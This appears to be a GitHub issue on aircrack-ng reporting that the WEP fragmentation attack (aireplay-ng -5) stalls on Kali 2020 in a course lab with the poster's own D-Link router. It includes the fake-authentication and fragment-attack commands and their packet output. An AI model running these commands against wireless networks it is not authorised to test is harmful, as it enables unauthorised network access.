aircrack-ng icon indicating copy to clipboard operation
aircrack-ng copied to clipboard

Unable to complete "attacks" - Fragment attacks/etc.

Open raithedavion opened this issue 4 years ago • 0 comments

Issue type

REMOVE THOSE WHICH DO NOT APPLY

  • Defect - Unexpected behavior (obvious or confirmed in the forum)

System information

  • OS: Kali 2020
  • CPU: Virtual Intel Core i7 7700k
  • Wireless card and chipset (if relevant): Alfa Networks AWUS036NHA

Aircrack-ng version

  • Version: 1.6 & fresh github pull
  • Commit Revision hash:

Defect

How to reproduce the issue

I'm using virtual machines for this: Kali 2020 (has aircrack-ng v 1.6), and a secondary test machine that is kali 2016.2 (has aircrack-ng 1.2 rc4).

So, I'm taking the Offensive-Security Wireless course. I have a dlink 601 router, and the alfa usb card. I setup the dlink router as directed in the course (WEP, open mode, some basic keys). Using Kali 2020, and following just about any guide, I turn on monitor mode with airmon-ng.

I then do the initial fake auth, which works. Then immediately do the fragment attack (-5). It gets the first packet as shown in the console output below, however if just stays there and does nothing else. I tested using the same commands and whatnot using kali 2016.2, and the fragment attack works. I did a reboot of the Kali 2020 VM and re-tested with no change. I then did a git pull of the current github and performed the installation steps and did the reconfigure with-experimental options. Did the make/make install. Same result. Any help would be appreciated even if its just something stupid I'm forgetting to do.

raithedavion@kali2020:~/aircrack-ng$`` sudo aireplay-ng -1 0 -e dlink_vuln -a 5C:d9:98:6a:bf:3e -h 00:C0:CA:98:4F:23 wlan0mon
21:44:18  Waiting for beacon frame (BSSID: 5C:D9:98:6A:BF:3E) on channel 6

21:44:18  Sending Authentication Request (Open System) [ACK]
21:44:18  Authentication successful
21:44:18  Sending Association Request [ACK]
21:44:18  Association successful :-) (AID: 1)

raithedavion@kali2020:~/aircrack-ng$ sudo aireplay-ng -5 -b 5C:D9:98:6A:BF:3E -h 00:C0:CA:98:4F:23 wlan0mon
21:44:28  Waiting for beacon frame (BSSID: 5C:D9:98:6A:BF:3E) on channel 6
21:44:28  Waiting for a data packet...
Read 251 packets...

        Size: 144, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  5C:D9:98:6A:BF:3E
          Dest. MAC  =  33:33:00:00:00:01
         Source MAC  =  5C:D9:98:6A:BF:3E

        0x0000:  0842 0000 3333 0000 0001 5cd9 986a bf3e  .B..33....\..j.>
        0x0010:  5cd9 986a bf3e d0b5 e0a8 2400 2faf d225  \..j.>....$./..%
        0x0020:  a225 f1f2 6d9e b16d f8e4 2845 9b6b f7ca  .%..m..m..(E.k..
        0x0030:  b173 cffa 48a4 6624 566a 45bb 27da fc46  .s..H.f$VjE.'..F
        0x0040:  7654 16f2 098a 18e2 3cc1 ffd2 68a6 8c8f  vT......<...h...
        0x0050:  517b 3e5d d5ed aa93 d59e 23b7 f357 b3ef  Q{>]......#..W..
        0x0060:  4d3d 91b9 f587 1536 1cce 9702 ceb3 db3c  M=.....6.......<
        0x0070:  e956 fcb1 f5a6 004e 4a2f 8136 a44d a483  .V.....NJ/.6.M..
        0x0080:  7d72 1758 d486 6d09 ecfc 47b1 71ef 3f5f  }r.X..m...G.q.?_

Use this packet ? y

Saving chosen packet in replay_src-0712-214433.cap
21:44:35  Data packet found!
21:44:35  Sending fragmented packet
21:44:35  Got RELAYED packet!!
21:44:35  Trying to get 384 bytes of a keystream
^C

Related issues

None.

raithedavion avatar Jul 13 '20 04:07 raithedavion